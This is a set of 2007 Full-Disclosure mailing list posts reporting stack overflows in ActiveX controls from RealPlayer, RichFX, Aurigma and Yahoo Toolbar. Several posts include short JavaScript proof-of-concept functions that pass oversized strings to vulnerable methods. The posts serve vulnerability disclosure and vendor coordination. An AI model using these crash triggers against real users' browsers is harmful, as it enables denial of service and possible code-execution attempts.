Re: [Full-disclosure] Aurigma ImageUploader 4.1 Multiple stack overflows

2007-11-25 Thread Elazar Broad
I have been in contact with Aurigma and they have fixed the issue. They plan on 
releasing an update on Monday. I would like to thank Andrew S. and the Aurigma 
development team for a fast response and a quick turnaround.

Elazar 



[Full-disclosure] RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-26 Thread Elazar Broad
There are multiple stack overflows in the ierpplug.dll ActiveX Control. These 
issues were originally discovered by shinnai, 
http://www.securityfocus.com/bid/22811 and 
http://www.securityfocus.com/bid/21802. I am adding the Import() and 
PlayerProperty() functions to the list. This was tested on Windows XP SP2 fully 
patched, using IE 6; RealPlayer version 11, build 6.0.14.738, dist R41R01, 
ierpplug.dll version 1.0.1.3016. I have not tested code execution. PoC as 
follows:

function Check() {
  var s = "";

  while (s.length < 99) s=s+s;

  var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}

  obj.Import(s);
  var obj2 = obj.PlayerProperty(s);
}

Elazar



[Full-disclosure] RichFX nprfxins.dll ActiveX Control Multiple Stack Overflows

2007-11-26 Thread Elazar Broad
There are multiple stack overflows in the RichFX nprfxins.dll ActiveX Control.
I am almost positive that this control was installed with RealNetworks RealPlayer.
This was tested on Windows XP SP2 fully patched and IE6. This control is marked
safe for scripting. I have not tested code execution. PoC as follows:

function Check() {
  var s = "";

  while (s.length < 99) s=s+s;

  var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr"); //{47F59200-8783-11D2-8343-00A0C945A819}

  obj.DoInstall(s);
  obj.QueryComponents(s);
}

Elazar



Re: [Full-disclosure] RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-26 Thread Elazar Broad
Supposedly Real fixed the Import() method overflow in October, 
http://secunia.com/advisories/27248/, I guess not, or it is no longer 
exploitable(I haven't tested it). Anyhow, that still leaves the ones that 
Shinnai found among others, and the PlayerProperty() method that I posted 
yesterday. 

Elazar



[Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-26 Thread Elazar Broad
After some creative Googling, I am revising my original post. I believe that 
the Import() method overflow that I originally posted is really 
http://www.securityfocus.com/bid/26130, although I am not sure why Linux is 
listed under the "Vulnerable" section, so I am taking it out of the PoC code. 
Real claims to have patched this back in October, but I can still throw a stack 
overflow exception via this function using the originally stated version of 
RealPlayer(which I installed last night). I am now listing this vulnerability 
as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method 
Stack Overflow, and it might be wise to list this under a separate BID. PoC as 
follows:

-
function Check() {
  var s = "";

  while (s.length < 99) s=s+s;

  var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}

  var obj2 = obj.PlayerProperty(s);
}
-

Elazar



Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-27 Thread Elazar Broad
Ouch is right.. I know I confused a lot of people, I apologize for that.
Anyhow, SecurityFocus moved the PlayerProperty() issue from 22811 to its own
BID, http://www.securityfocus.com/bid/26586. I have been in contact with
Symantec's DeepSight team, and it looks like the Import() function will still
throw a stack overflow exception, however it does not appear to overwrite the
EIP, making it a plain old DoS attack. I believe they plan to post a write-up
on this.

Elazar

-Original Message-
From: James Matthews <[EMAIL PROTECTED]>
Sent: Nov 26, 2007 7:24 PM
To: Elazar Broad <[EMAIL PROTECTED]>
Cc: "full-disclosure@lists.grok.org.uk"
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

Ouch!

On Nov 26, 2007 9:15 PM, Elazar Broad <[EMAIL PROTECTED]> wrote:
> After some creative Googling, I am revising my original post. I believe that
> the Import() method overflow that I originally posted is really
> http://www.securityfocus.com/bid/26130, although I am not sure why Linux is
> listed under the "Vulnerable" section, so I am taking it out of the PoC code.
> Real claims to have patched this back in October, but I can still throw a
> stack overflow exception via this function using the originally stated
> version of RealPlayer (which I installed last night). I am now listing this
> vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control
> PlayerProperty() Method Stack Overflow, and it might be wise to list this
> under a separate BID. PoC as follows:
>
> -
> function Check() {
>   var s = "";
>
>   while (s.length < 99) s=s+s;
>
>   var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
>
>   var obj2 = obj.PlayerProperty(s);
> }
> -
>
> Elazar

--
http://www.goldwatches.com/coupons/
http://www.jewelerslounge.com



[Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS

2007-11-30 Thread Elazar Broad
There is a stack overflow in the c() method of the Yahoo Toolbar Helper class.
This overflow does not appear to get anywhere near the EIP or SEH. PoC as
follows:

--
function Check() {
  var s = "";

  while (s.length < 99) s=s+s;

  var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-C3F9-4EFB-9B51-7695ECA05670}
  obj.c(s);
}
--

Elazar
